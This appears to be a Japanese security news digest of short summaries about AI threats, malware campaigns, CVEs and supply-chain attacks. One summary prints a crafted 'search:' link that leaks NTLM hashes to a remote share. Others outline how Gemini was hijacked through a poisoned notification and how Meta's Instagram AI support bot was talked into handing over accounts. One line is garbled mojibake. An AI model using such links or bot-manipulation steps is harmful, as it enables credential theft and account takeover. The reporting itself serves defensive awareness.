プロンプトインジェクション、LLM脆弱性、AIを悪用したサイバー攻撃——急速に進化するAIセキュリティの脅威を、日本語でわかりやすく解説します。
「便利だから」という理由でAIツールを使い始めた社員が、知らずに会社の機密情報を外部に送り続けているケースが急増しています。
「議事録を要約して」「この提案書を直して」——その入力の中に、クライアント名・案件金額・個人情報が含まれていませんか?ChatGPTへの入力はOpenAIのサーバーに送信されます。
ディープフェイク技術で上司や経営者の声を模倣し、「今すぐ送金して」と指示する詐欺が急増。AIで生成した音声は本物と区別がつかないレベルに達しています。
以前は不自然な日本語で見抜けたフィッシングメールが、AIにより完璧な文章で届くようになりました。取引先を装った請求書の差し替えや、添付ファイルを使った攻撃が増加中。
米国財務省の外国資産管理局(OFAC)は、イラン最大の暗号資産取引所「Nobitex」に対して制裁を発表しました。同取引所がテロ活動関連の送金を仲介していたためです。【何が起きたか】Nobitexはランサムウェア(身代金要求型マルウェア)の実行犯であるイランの攻撃者グループが、違法な身代金支払いを受け取る際に利用されていました。【影響範囲】この制裁により、Nobitexは米国との金融取引が禁止され、同取引所の資産が凍結される可能性があります。また、同取引所を利用する企業やユーザーも間接的な影響を受ける恐れがあります。【対策】企業はランサムウェア対策の強化とOFAC制裁リストの定期確認が重要です。
CISA(米国サイバーセキュリティ庁)、FBI、NSA、エネルギー省などの米国政府機関が、重要インフラ施設の燃料・液体貯蔵タンク監視用に使われるATG(自動タンク計測装置)システムへのサイバー攻撃について警告を発令しました。これらのシステムはインターネットに接続されており、ハッカーに狙われています。ATGシステムはエネルギー、化学、水道など複数のインフラセクターで広く使用されており、侵害された場合、タンク内容物の盗難、施設の運用停止、さらには安全保障上の重大な脅威となる可能性があります。政府機関は対象組織に対し、これらのシステムへのアクセス制限やネットワーク分離などの対策実施を強く推奨しています。
セキュリティ研究者Or Yairが、WhatsAppやSlackなどのアプリからの通知を悪用してAndroid版Google Geminiの音声アシスタント機能をハイジャックする脆弱性を発見しました。攻撃者は悪意あるアプリをインストールさせることなく、単一の毒性通知を送信するだけで、被害者のウィンドウを開く、上司になりすまして指示する、Zoomに自動参加させるなど実害を与えることができます。攻撃表面は「ほぼ無限」に広がっています。Google は「Fake Context Alignment」と名付けられた新しい回避方法に対して既にパッチを適用済みですが、野生での悪用例はまだ報告されていません。この脆弱性はAndroid版のみで、iOS版やWeb版には影響しません。
ログ監視・分析企業のCoralogixが、シリーズFラウンドで2億ドルの資金調達を実施し、企業評価額が16億ドルに達したと発表しました。同社はログ(システムの記録)、メトリクス(数値データ)、トレース(処理の流れ)、セキュリティ、AI監視を統合する包括的な監視プラットフォームを提供しており、今回の調達によって製品機能の拡張と市場展開の加速を目指しています。AI技術の進展に伴い、企業のシステムやAIアプリケーションの動作状況を可視化・監視する需要が急増する中、Coralogixの統合プラットフォームは重要性が高まっています。今回の大規模調達は、AI監視技術市場における競争激化と投資家の期待の高さを示しています。
サイバーセキュリティ研究者が、Googleの正規ドメイン「DoubleClick」を悪用して遠隔アクセストロイの木馬「DesckVB RAT」を配布する新たなマルスパムキャンペーンを発見しました。攻撃は、フィッシングメールの添付HTMLファイルから始まり、DoubleClickのURL経由でリダイレクトされます。その後、被害者のメールアドレスを使用して動的に企業ロゴや位置情報を組み込んだ偽のダウンロードページを表示し、説得力を高めています。このキャンペーンの脅威は、正規Googleドメインを使用することで検出回避ができ、運用コストを削減できるため、スケーラブルな攻撃が可能な点です。DesckVB RATは.NETベースのトロイの木馬で、PowerShellスクリプト経由で実行され、WindowsディフェンダーやAMSI(マルウェア対策スキャンインターフェース)などのセキュリティ機能を無効化します。
Metasploit開発者のHD Moore氏によるウェビナーでは、組織が想定しているネットワークセグメンテーション(異なるシステム区間の分離)が実際には機能していない現状を指摘しています。一般的な問題として、未登録デバイスが複数ネットワークに接続して区間を橋渡ししたり、スキャンツールに検出されない産業用プロトコルゲートウェイの背後に隠れたシステムが存在したりすることが挙げられます。攻撃者は静的な資産リストではなく、ネットワークパス(侵害から次の段階への到達経路)を読み地図化します。対策として、組織は未認可IT・シャドウIoTの発見、セグメンテーションを破る多接続デバイスの特定、実際の攻撃経路を示すライブマッピングの導入、そして影響範囲を最小化する重要資産からの優先的な修復が必要とされています。
Microsoft 365の複数のAndroidアプリ(Word、PowerPoint、Excel、Copilot、Loop、OneNote)にセキュリティ脆弱性が見つかりました。本番環境に遺されたデバッグフラグ「setIsDebugMode(true)」により、アカウント認証トークン(FOCI トークン:複数アプリ間でシングルサインオンを実現するリフレッシュトークン)の共有検証が無効化されていました。その結果、同じスマートフォン内の悪意あるアプリが、ユーザーのパスワードやログイン画面なしに、メール読み取りやカレンダー閲覧、メッセージ送信などを実行できました。Microsoftは5月12日に4つのCVEを公開し、既にGooglePlayを通じてパッチが配布されています。ユーザーはこれらのアプリをすぐに更新する必要があります。
Redis データベースに、認証済みユーザーが任意のOS コマンドを実行できる「use-after-free」(解放済みメモリの再利用)脆弱性(CVE-2026-23479)が存在していました。自律型AI ツールによって発見されたこの脆弱性は、Redis 7.2.0 で導入され、2年以上にわたり複数のセキュリティレビューをすり抜けました。CVSS スコアは8.8(高危険度)です。影響範囲は広く、クラウド環境の大多数で Redis が稼働しており、多くはパスワード保護されていません。脆弱性は blocking-client コード内の unblockClientOnKey() 関数に存在し、メモリ領域の段階的な改ざん、ヒープアドレス漏洩、偽クライアント構造体の注入、関数ポインタ改ざんという複雑な攻撃チェーンにより悪用されます。2023年1月と3月の異なるコード変更が組み合わさり脆弱性が生成されました。5月5日の修正適用が推奨されます。
SecurityWeekの報道によると、WordPressプラグイン「Kirki」と「Burst Statistics」に存在する脆弱性が、攻撃者に悪用されています。これらのプラグインの脆弱性を利用することで、攻撃者は権限昇格(ユーザーの権限を無断で高める)を行い、Webサイト全体を乗っ取る(サイト管理権を奪う)ことが可能になっています。影響範囲としては、これらのプラグインを導入している多くのWordPressサイトが対象となります。セキュリティ対策としては、該当プラグインの最新版へのアップデート、不要なプラグインの削除、アクセス権限の厳格な管理が急務となっています。
SecurityWeekが100個のAIエージェント(AI技術を使った自動実行プログラム)に対してセキュリティテストを実施し、ランク付けを行いました。本テストは「AI Risk Quadrant」という評価フレームワークを使用し、3つの重要な要素に基づいてAIエージェントを評価しています。①脆弱性(悪意のある攻撃者に侵害される可能性の高さ)、②侵害時の影響度(被害がどの程度深刻か)、③セキュリティ防御力(対抗措置の強さ)です。このテスト結果により、AIエージェント導入企業がセキュリティリスクを適切に評価・選別できるようになります。AI技術の急速な普及に伴い、セキュリティ面での信頼性確保が重要な課題となっており、本研究はAIセキュリティの標準化に向けた重要なステップです。
Microsoft Visual Studio Code(VS Code)の機能「GitHub.dev」を悪用した攻撃が発見されました。攻撃者がリンクをクリックさせるだけで、ユーザーのGitHubの認証トークン(OAuth トークン)を盗み取ることができます。 【何が起きたか】悪意のあるVS Code拡張機能をインストールさせ、GitHub.devに送信される認証トークンを窃取する手口です。メッセージング機能の脆弱性を悪用し、untrustedなwebview内で不正なJavaScriptを実行。Ctrl+Shift+Pで「コマンドパレット」を開き、攻撃者が用意した拡張機能をインストールさせます。 【影響範囲】盗まれたトークンは特定リポジトリに制限されず、ユーザーがアクセス可能なすべてのリポジトリ(プライベートを含む)への読み書きが可能です。攻撃者は被害者がアクセスできるプライベートリポジトリをすべて列挙できます。 【対策】2026年6月2日にマイクロソフトへ報告され、詳細が公開されています。Microsoftは脆弱性を認識しており、修正対応が進められていますが、詳細な対策内容は未発表です。
世界的な証券取引所がサイバー攻撃の対象となった。攻撃者は高級幹部のメールアカウントに150日間にわたってアクセスでき、その間、重要なデータを数ヶ月にわたって盗み出していたという。このスパイ行為は、企業機密や市場情報など機密性の高い情報が流出した可能性を示唆している。長期間の不正アクセスが検出されないままだったことから、初期段階での侵入検知システムの脆弱性が浮き彫りになった。金融機関は今後、メールアカウントのアクセス監視強化、多要素認証(MFA)の導入、定期的なセキュリティ監査の実施など、侵入の早期発見と防止対策を急務とする必要がある。
現代のエンタープライズ環境では、ID管理が複数アプリケーション・チーム・AI自動化システムに分散し、企業のID活動の46%が中央集中型IAM(Identity and Access Management:ID・アクセス管理)の可視化範囲外で発生している「ID暗黒物質」という問題が生じています。これは未管理アプリケーション、ローカルアカウント、権限過多の非人間ID(機械)などを含み、セキュリティチームの把握外で存在するリスクとなっています。対策として、Gartnerが提唱したIVIP(Identity Visibility and Intelligence Platform)は、統合されたデータとAI分析を用いて、人間と非人間のID全体を継続的に発見・分析する知能エンジンとして機能し、分断されたID情報を統合し、これまで見えなかった攻撃面を可視化・縮小することが求められます。
Linuxカーネルに認証不備(パスワードやセキュリティチェック不足)の脆弱性が存在し、すでに悪用されていることが報告されました。この脆弱性を悪用すると、攻撃者は権限昇格(低い権限から高い権限への昇格)が可能になり、さらにコンテナ脱出(仮想環境から脱出)も実行できます。コンテナはDockerなどで動作する隔離された環境で、多くの企業がクラウドサービスで使用しており、この脱出は大きなセキュリティリスクになります。組織はLinuxシステムの緊急アップデートの確認と導入が必要です。
複数の主要なウェブサーバーのデフォルト設定に、圧縮爆弾とSlowloris攻撃を組み合わせた新たな脆弱性が発見されました。この『HTTP/2爆弾』攻撃では、攻撃者が圧縮データを悪用して膨大なメモリを消費させ、同時にサーバーの処理を遅延させることで、数秒以内にウェブサーバーをオフライン状態に落とすことが可能です。圧縮爆弾はデータ圧縮機能を悪用して小さなペイロードを展開時に莫大なサイズに膨張させる攻撃で、Slowloris攻撃はリソースを長時間保持して消耗させます。この脆弱性の影響範囲は広く、デフォルト設定のまま運用されている企業サーバーが特に危険です。現在のところ、対策としてはHTTP/2の圧縮機能の無効化やリソース制限の厳格化が推奨されています。
セキュリティ研究者が、Windows Searchの「search:」URIハンドラに存在する未修正の脆弱性を公開しました。攻撃者は特別に細工されたリンク(例:search:query=test&crumb=location:\\10.0.1.100\share)をメールやWebサイトに埋め込み、ユーザーをクリックさせることで、ユーザーのNTLMv2ハッシュ(Windows認証情報の一種)を盗聴できます。これは2026年4月15日に責任ある情報開示が行われましたが、Microsoftは「Critical以上の重大度のみ修正対象」という理由で修正を拒否しました。盗聴されたハッシュは、リレー攻撃に利用されてネットワーク内へのより深い侵入が可能になります。対策としては、不要なSMB通信の遮断、SMB署名の強制、NTLMの無効化が推奨されています。
マイクロソフトがセキュリティ研究者によるゼロデイ脆弱性(未修正の重大な欠陥)の公開に対して法的措置を検討するという声明に対して、業界から強い反発を受けました。同社は現在、この法的脅迫に関する懸念を緩和しようとしています。ゼロデイ脆弱性の公開は責任ある情報公開と強権的な法的措置のバランスをめぐる重要な問題で、セキュリティ研究コミュニティの信頼に影響します。マイクロソフトは今後の方針を明確にし、研究者との関係を修復することが急務です。
Googleは、AIを使用して個人の連絡先になりすましたスキャム電話(詐欺電話)を検出・警告する新しいAndroidセキュリティ機能を導入しました。【何が起きたか】詐欺師が音声合成AI技術を悪用し、ユーザーの家族や友人の声を模倣して電話をかけ、金銭要求などの詐欺を行う事件が増加しています。【影響範囲】Androidスマートフォンユーザー全体が対象となり、特に高齢者など詐欺に狙われやすい層の被害防止が期待されます。【対策】Google Phone(Googleの標準電話アプリ)が搭載される本機能は、通話中にAIによる声の模倣を検出し、ユーザーに警告通知を表示することで、詐欺被害を事前に防ぐ仕組みです。
サイバーセキュリティ研究者が、NGINX、Apache HTTPD、Microsoft IIS、Envoy、Cloudflareなど主要なウェブサーバーに影響する新たなリモート・サービス妨害攻撃(DoS)脆弱性を発見しました。「HTTP/2爆弾」と名付けられたこの脆弱性は、HTTP/2のヘッダ圧縮スキーム「HPACK」を悪用し、1バイトのデータがサーバー上で完全なヘッダ割り当てに拡大される仕組みです。攻撃者は低速通信(100Mbps)環境からでも数秒で標的サーバーを機能停止させられます。Apache HTTPDとEnvoyに対しては、1つのクライアントが約20秒で32GBのサーバーメモリを消費・保持可能です。既知の圧縮爆弾技術とSlowloris型攻撃を組み合わせた手法で、デコードされたサイズ制限をバイパスします。
McAfee Labsが「Weedhack」と命名した新たなマルウェア配布キャンペーンを発見しました。このキャンペーンは2026年1月から活動しており、YouTubeのSEO汚染(検索結果を悪用する手法)を使用してMinecraftプレイヤーを標的にしています。3,820個の悪意あるJARファイルと240以上の配布用URLが確認されました。攻撃者は企業向けダッシュボード「weedhack.to」を使用して、盗まれた認証情報とシステム情報を管理し、被害者のシステムを遠隔操作できます。マルウェアはEtherHiding技術(Ethereumブロックチェーンを悪用)を使用してコマンドサーバーにアクセスし、複数のJARペイロードを段階的に展開します。無料版では36個のブラウザやDiscord、Steam、Telegramの認証情報を盗取可能です。
JPCERT/CCが2026年5月24日~30日の週間セキュリティレポートを公開しました。GitLabを含む11種類のソフトウェアやサービスで複数の脆弱性が報告されています。特にGitLabでは複数の脆弱性が発見され、修正済みバージョンへの更新で解決します。その他、Oracle製品、Google Chrome、Gitea、Joomla!、Samba、Roundcube Webmail、NGINXなど広範なアプリケーションやサーバーソフトウェアに脆弱性が確認されました。また、Atril・Evince・Xreaderなどの文書閲覧ソフトでは、細工されたPDFを開くことで任意のコード実行が可能な脆弱性も発見されています。各製品開発元が提供する修正情報を確認し、速やかにパッチを適用することが重要です。
JPCERT/CCが2026年5月24日~30日のセキュリティ関連情報をまとめたレポートで、Atril、Evince、Xreaderの3つのPDFビューアアプリケーションに引数インジェクション脆弱性(コマンドラインの引数に悪意あるコードを挿入できる脆弱性)が発見されたことを報告しました。攻撃者が細工したPDFファイルをユーザーに開かせることで、ユーザーの権限で任意のコードを実行される可能性があります。この他、Oracle製品、Google Chrome、GitLab、Samba、Roundcube Webmail、NGINXなど複数の主要ソフトウェアにも多数の脆弱性が報告されています。開発元からパッチ(修正プログラム)が提供されている場合は、速やかに適用することが推奨されます。
JPCERT/CCが2026年5月24日~30日に報告したセキュリティ脆弱性情報です。最も注目すべきはOracle製品の複数の脆弱性で、詳細は開発元の情報を確認が必要です。また、PDFビューア(Atril、Evince、Xreader)では任意コード実行が可能な脆弱性が発見され、細工されたPDFファイルを開くことで攻撃者の権限で悪意あるコードが実行される危険があります。このほか、Google Chrome、GitLab、Gitea、Joomla!、Samba、Apache Fory、Roundcube Webmail、NGINXにも複数の脆弱性が報告されており、GitHubではGPG公開鍵の漏洩問題も指摘されています。各ソフトウェアの修正済みバージョンへのアップデートが推奨されます。
JPCERT ã³ã¼ãã£ãã¼ã·ã§ã³ã»ã³ã¿ã¼ Weekly Report ãåãåãã æ¡ç¨æ å ± ãµã¤ãããã English --> --> powered by Yahoo! JAPAN ãã®ãµã¤ãå ãæ¤ç´¢ ã¦ã§ãå ¨ä½ãæ¤ç´¢ ææ°æ å ±ãåå¾ (RSS | ã¡ã¼ãªã³ã°ãªã¹ã) HTTPS ã¢ãã¤ã« ã¤ã³ã·ãã³ãã¨
OpenAIは既存のGPT-5.5 Instantモデルの改善版をロールアウトしていると発表しました。このアップデートは、o3を含む複数のレガシー(旧型)モデルの廃止予定に先駆けて実施されています。GPT-5.5 Instantは、より高速で効率的なAIモデルとして設計されており、ユーザーはより迅速なレスポンスを期待できます。影響範囲としては、現在レガシーモデルを使用している開発者やAPI利用者が対象となります。ユーザーは廃止予定のモデルから新しいGPT-5.5 Instantへの移行を準備する必要があります。OpenAIはモデルの継続的な改善と最新化を通じて、サービスの性能向上を図っています。
WeedHackと名付けられた大規模マルウェアキャンペーンがMinecraft(人気ゲーム)プレイヤーを標的にしており、1月以降11万6000台以上のシステムに感染しています。このマルウェア(コンピュータに悪影響を与える悪意あるプログラム)は、ゲーム関連のファイルやMod(ゲームの改造プログラム)に偽装して配布されており、感染したシステムは個人情報の盗難やコンピュータの乗っ取り被害を受ける危険があります。ユーザーは信頼できる公式なダウンロード先のみを利用し、セキュリティソフトを最新に保つことが重要です。
トランプ大統領が署名した行政令により、米国連邦政府は最先端のAI(人工知能)システムに対する安全保障上のリスク評価の枠組みを新たに確立しました。本制度により、高度なAIモデル開発企業は公開リリース前に最大1ヶ月間、政府による安全保障リスク審査を受けることになります。これにより、AIシステムが国防機密の流出やサイバー攻撃に悪用される可能性などを事前に検査します。対象となるのは最も高度な能力を持つAIモデルで、開発企業の自主性と政府の安全保障要件のバランスを取りながら、AI技術の急速な発展に伴う国防上の脅威に対応する試みとなっています。
脅威アクターがAI技術を用いて開発されたランサムウェア攻撃ツールキットを使用しており、Active Directory(AD:組織内のユーザーやコンピュータを一元管理するシステム)の発見を自動化し、EDR(Endpoint Detection and Response:端末の脅威検知・対応ソリューション)の検知回避を支援しています。このツールキットの登場により、攻撃者は従来より高度な自動化と検知回避能力を備えた攻撃が可能になり、企業のエンドポイント防御を突破するリスクが大幅に増加しています。組織は既存のセキュリティソリューションの強化とAIを活用した攻撃への対策強化、ネットワークセグメンテーションの実施が急務とされています。
ロシア連邦保安庁(FSB)傘下のハッカー集団Gamaredonが、WinRARの脆弱性(CVE-2025-8088、パストラバーサル脆弱性)を悪用してウクライナを標的にした攻撃キャンペーンを展開しています。GammaPhish(HTMLアプリケーション)→GammaLoad(VBScriptダウンローダー)という感染チェーンを通じて、GammaWorm(ワーム)とGammaSteel(情報窃取マルウェア)を配信しています。GammaWormは、ネットワーク共有やUSBドライブ内の正規ファイルを隠して悪意あるショートカットに置き換え、スケジュール化されたタスクで永続性を確立。Telegramチャネルを利用してC2サーバーと通信し、検出を回避しながら長期的なスパイ活動を実行します。GammaSteel は AWS S3バケットへファイルを流出させます。政府・軍・重要インフラが主要標的です。
Microsoftは、北米とドイツ地域のExchange Online(クラウドメールサービス)で発生した広範なサービス障害に対応しています。この障害はメールフロー(メール送受信処理)のパイプラインに影響を与えており、ユーザーはメール遅延やメール送受信の失敗に直面しています。Exchange Onlineはビジネス用途で広く利用されているため、影響を受ける企業や組織は業務に支障をきたしている可能性があります。Microsoftは問題の特定と解決に向けて作業を進めているが、復旧までの具体的なタイムラインは未発表です。
SecurityWeekの報道によると、AIの発展により脆弱性の発見から悪用までの時間が短縮され、サイバーセキュリティの危機が深刻化しています。研究者コミュニティは対策について2つの見解に分かれています。一方は不十分なセキュリティツール(脆弱性検出ツールやパッチ管理システムなど)が問題だと主張し、他方は運用管理の不備(セキュリティポリシー遵守やシステム監視の不徹底など)が原因だと指摘しています。どちらの見方が正しいかで、企業が取るべき対策が大きく異なります。ツール強化と運用プロセス改善のいずれに投資すべきかについて、専門家の間で議論が続いており、統一的な対策戦略の構築が急務となっています。
複数のInstagramユーザーが、攻撃者によってMetaのAI搭載サポートツール(自動顧客支援システム)を悪用されアカウントを乗っ取られました。攻撃者はAIに対して自分が正当な所有者であると偽って主張し、AIがこれを信じてアカウント復旧プロセスを進めてしまったことが原因です。この手法により、二段階認証などのセキュリティ機構を迂回されています。被害はInstagramユーザーに限定されず、Meta傘下の複数サービスに及ぶ可能性があります。現在のところ、Metaからの公式対策発表は限定的で、ユーザー側の防御手段も限られているのが実情です。
AI技術の悪用とシャドーAI(未認可のAI導入)により、ブラウザ環境に新しいセキュリティリスクが発生しています。ユーザーがブラウザで生成AIツールを無断利用したり、攻撃者がAIを活用した新型攻撃を仕掛けたりすることで、企業のデータ漏洩やマルウェア感染のリスクが増加しています。Push Securityの指摘によれば、これらの脅威に対抗するには、ブラウザレベルでのネットワーク可視化が重要です。ブラウザトラフィックを監視・分析することで、不正なAI利用検知と、組織的なAIガバナンス(適切な利用管理)の実現が可能になります。
ESET研究者らが、ロシア国家系サイバースパイグループ「ガマレドン」と「トゥーラ」の直接的な協力関係を初めて技術的証拠で明示しました。2025年2月〜6月の複数の事件で、ガマレドンが開発したツール(PteroGraphinやPteroOdd)を使い、トゥーラの高度なバックドア型マルウェア「Kazuar」をウクライナの軍事・政府組織に展開していたことが確認されました。ガマレドンは初期アクセスを確立・維持し、トゥーラはより高度なスパイツールを展開するという役割分担が見られます。この協力関係はロシアのサイバー諜報作戦における労働分業の実態を示す稀な事例です。防御側は初期侵入活動と事後段階の目的を関連付けて理解し、ウクライナ情勢下での高度な脅威に対応する必要があります。
米国のサイバーセキュリティ機関CISAが、Oracle WebLogicサーバーの高リスク脆弱性について、政府機関に対して早急な対策を命じました。この脆弱性は2年前にすでにパッチ(修正プログラム)が提供されていたにもかかわらず、現在、実際の攻撃で悪用されていることが判明しました。WebLogicサーバーはWebアプリケーションを実行するソフトウェアで、多くの企業や政府機関が使用しています。CISAの命令に従い、政府機関は速やかにこの脆弱性の修正を適用する必要があります。パッチの長期未適用が新たな攻撃のリスクになっていることが示されました。
本記事は、AI技術がサイバー攻撃者にもたらす脅威について警告しています。AIは攻撃者がマルウェア(コンピュータに害をなすプログラム)を生成し、悪意あるペイロード(攻撃用コード)を作成し、単純なセキュリティチェックを回避し、曖昧な悪意のある意図から実際に動作する機能的なコードへと変換することを可能にしています。これにより、技術的な知識が限定的な攻撃者でも効率的に高度な攻撃を実行できるようになります。さらに重要なのは、この傾向が「責任ある脆弱性開示」という従来のセキュリティ慣行の終焉につながる可能性があるという指摘です。責任ある開示とは、企業に脆弱性を先に通知して修正機会を与える慣行ですが、AIの悪用により、この体制が機能しなくなる恐れがあります。
AIを活用した脆弱性の悪用が加速し、セキュリティ業界に深刻な問題をもたらしています。かつて脆弱性(ソフトウェアの欠陥)が発見されてから実際に悪用されるまでに数日の猶予がありましたが、現在はわずか数時間に短縮されています。Anthropicの調査では、AI技術により1ヶ月で1万件以上の重大な脆弱性が発見されており、防御側だけでなく攻撃者も同じAIツールを使用しています。一方、企業のパッチ(修正)対応は32日から43日に増加しており、攻撃者は数時間、防御側は数週間という時間差が拡大。従来の「速くパッチを当てる」という対策だけでは不十分になり、検査や承認プロセスの制約を考慮した包括的な防御戦略が必要とされています。
Metaが提供するAIチャットボットの脆弱性により、ハッカーが高名なInstagramアカウントを乗っ取られる事件が発生しました。 【何が起きたか】 ハッカーはAIチャットボットに対して「混乱した代理人」(confused deputy)と呼ばれる脆弱性を悪用しました。これは、AIが本来許可されていない操作をユーザーの代わりに実行してしまうセキュリティ欠陥です。具体的には、チャットボットに対して単純に新しいメールアドレスへのアカウント連携を要求するだけで、Instagramアカウントの乗っ取りに成功しました。 【影響範囲】 複数の高名人や著名アカウントが被害を受けています。 【対策】 Metaはこの脆弱性の詳細な分析と修正が急務となり、AIチャットボットのセキュリティ監査の強化が必要です。ユーザーは強力なパスワードと二段階認証の設定を推奨します。
セキュリティ研究機関が、Red Hat関連の32個のNPMパッケージ(JavaScriptのライブラリ)に対するサプライチェーン攻撃を確認しました。攻撃者は96個の悪意あるパッケージバージョンを公開し、認証情報を盗み取るワーム(自己複製するマルウェア)を注入していました。このワームは「Mini Shai-Hulud」と呼ばれる既知の脅威と同様の機能を持っており、開発者がこれらのパッケージをプロジェクトに含めると、認証情報やトークンなどの機密情報が窃取される可能性があります。NPMはJavaScript開発において広く利用されているため、影響範囲は非常に広いと考えられます。ユーザーは直ちに依存パッケージの確認と更新、および認証情報のリセットを推奨されています。
パキスタンと関連のある「SideCopy」という攻撃グループが、アフガニスタン財務省を標的とした標的型フィッシング攻撃「Operation XENOFISCAL」を実行しました。攻撃は、パシュト語(アフガニスタンの主要言語)で書かれた悪意あるショートカットファイル(LNK)を含むZIPアーカイブをメールで送信することで開始され、実行されるとXeno RAT(遠隔操作ツール)がインストールされます。このマルウェアはキーロギング、スクリーンショット撮影、ウェブカメラ監視、ファイル操作など多機能な情報窃取機能を備えています。財務省の他、地方の収入・財務局や政府職員も対象となり、南アジア全体への広範な攻撃の一部と見られます。
CrowdStrikeのブログ記事は、AI技術の進化に伴って新たに出現したAI駆動型のデータ漏洩脅威に対する防止策を提示しています。従来のセキュリティ対策では対応できないAI技術を悪用した高度な攻撃手法が増加しており、企業のデータセキュリティが脅かされています。同社はエンドポイント保護(端末を狙う攻撃対策)、クラウドセキュリティ、脅威検知などを統合したFalconプラットフォームを活用し、AIによる不正アクセスやデータ抽出を検出・防止する包括的ソリューションを推奨しています。特にAI Factory環境やシャドウAI(無許可で使用されるAI)の制御層での監視強化が重要とされています。
パスワード管理ツールのDashlaneが、2026年5月31日に外部の攻撃者によるブルートフォース攻撃(パスワードを総当たりで試す攻撃)を受けたことを公表しました。攻撃者は二段階認証(2FA)を突破して新しいデバイスを登録しようとしました。その結果、20人未満の個人プラン利用者のパスワード保管庫(暗号化されたデータ)がダウンロードされました。ただし、保管庫内のデータはマスターパスワードで暗号化されているため、強力なパスワードを使用していれば実際のアクセスは困難です。Dashlane社のシステム自体への影響はありません。ユーザーは登録デバイスの確認、二段階認証の有効化、強力で予測困難なマスターパスワードの設定を推奨されています。
脅威アクターのDriveSurgeが、ClickFixおよびFakeUpdate(詐欺的な更新画面)という手口を使用した大規模なマルウェア配布キャンペーンを実行しています。攻撃者は侵害した数千のWebサイトを乗っ取り、訪問ユーザーに対して偽の更新通知やクリック詐欺を仕掛けます。これらの技術は正規サイトに見せかけることで、ユーザーの警戒心を低下させ、マルウェア感染やランサムウェア導入へと繋がります。被害範囲は広く複数業種のサイトが対象となっており、個人ユーザーから企業まで影響を受ける可能性があります。対策としては、ブラウザの警告に注意し、公式なチャネルからのみソフトウェア更新を行い、定期的なセキュリティ更新やアンチマルウェアツール導入が推奨されます。
Red Hatが提供する『@redhat-cloud-services』という名前空間下の30個以上のnpmパッケージ(JavaScriptの再利用可能コンポーネント)がサプライチェーン攻撃の被害に遭いました。攻撃者は『Miasma』という新しい亜種の『Shai-Hulud』認証情報窃取型マルウェアを混入させ、これらのパッケージをインストールした開発者の認証情報や個人情報を盗もうとしていました。このような供給チェーン攻撃は、信頼されているソフトウェアに悪意あるコードを注入する手法で、多くの開発者に影響が及ぶ可能性があります。ユーザーは提供されたセキュリティアップデートの適用と、認証情報の変更が推奨されています。
スペイン国家警察は、国家サイバーセキュリティ研究所(INCIBE)を含む複数の重要な国家機関の職員に関する機密情報を流出させた人物を逮捕しました。逮捕された容疑者は、政府職員の個人情報や機密データをインターネット上に公開していた疑いが持たれています。このドキシング行為(個人情報の悪意ある公開)により、対象となった政府機関職員は身元特定やプライバシー侵害、さらには身体的危害のリスクに晒されていました。影響範囲は複数の国家機関に及んでおり、国家レベルのセキュリティと職員の安全が脅かされていました。当局は情報流出の経路特定と被害の全容把握を進めており、今後の再発防止策の強化が求められています。
Red Hatのnpmパッケージ複数が「Miasma」と名付けられた供給チェーン攻撃により侵害されました。攻撃者は@redhat-cloud-servicesの7つ以上のパッケージに難読化されたプリインストールフックを埋め込み、開発者のGitHub Action認証情報、npmトークン、クラウド認証情報、SSHキー、Git認証情報などの機密情報を窃取します。盗まれた情報はencrypted形式でapi.anthropic.comへ送信され、GitHubのリポジトリに自動コミットされます。さらに悪質な点は、盗まれた認証情報を使用して他のプロジェクトを攻撃する自己拡散型ワームであり、攻撃ツールのオープンソース化により他の脅迫者による類似攻撃も懸念されます。開発環境を使用するすべての組織が影響を受ける可能性があります。
Metaが提供するInstagramのAIサポートボットに脆弱性が発見され、ハッカーがこれを悪用してアカウントを乗っ取る事件が発生しました。【何が起きたか】5月31日、テレグラムで攻撃方法が公開され、攻撃者がVPN(仮想プライベートネットワーク)を使用して対象者の住所近辺のIPアドレスを装い、AIボットにパスワードリセットをリクエスト。その後、ボットを説得して新しいメールアドレスをアカウントにリンクさせ、リセットコードを入手してアカウントを乗っ取る手口です。【影響範囲】オバマ前大統領のホワイトハウス公式アカウントとアメリカ宇宙軍の最高士官アカウントが一時的に侵害され、イラン支持者のプロパガンダ画像が投稿されました。高値で取引されるショートネームアカウント(50万ドル以上)も複数乗っ取られたとみられます。【対策】Metaは週末に緊急パッチを配信し、問題を解決したと発表しています。
セキュリティ研究者により、約2,000個のWordPressウェブサイトがマルウェアに感染していることが確認されました。このマルウェアの特徴は、命令・制御(C2)データをゲームプラットフォーム「Steam」のコミュニティプロフィールのコメント欄に隠蔽する手口です。攻撃者はSteamの正当なプロフィール機能を悪用することで、セキュリティ検査を回避しながら感染したサイトに対して不正な命令を送信します。WordPressサイトの管理者や運営者は、ウェブサイトの定期的なセキュリティ監査、プラグイン・テーマの更新維持、マルウェア検出ツールの導入が重要です。
Windowsのネットワーク認証機能「Netlogon」に関連するCVE-2026-41089という重大な脆弱性が報告されました。この脆弱性は深刻度が高く、既に攻撃者に悪用されている可能性があります。Netlogonはドメイン認証に使用される重要な機能で、この脆弱性を悪用されると、攻撃者が企業ネットワークへの不正アクセスやデータ窃取を行う恐れがあります。セキュリティ専門家は、影響を受けるすべての組織に対して、可能な限り早急にセキュリティパッチを適用することを強く推奨しています。
攻撃者による脆弱性悪用のスピードが、多くの組織の特定・修正能力を上回っている状況が報告されています。脆弱性とはソフトウェアやシステムの欠陥のことで、攻撃者はこれを悪用してシステムに侵入します。SecAlertsは、より迅速な脆弱性アラート通知システムの導入により、組織の露出リスクを軽減し、セキュリティ対応時間を大幅に短縮できると指摘しています。従来は脆弱性公開から悪用までに時間的余裕がありましたが、現在はこの期間が極めて短くなっているため、リアルタイムに近い速度での脅威検知と通知が組織の防御力を左右する重要な要素となっています。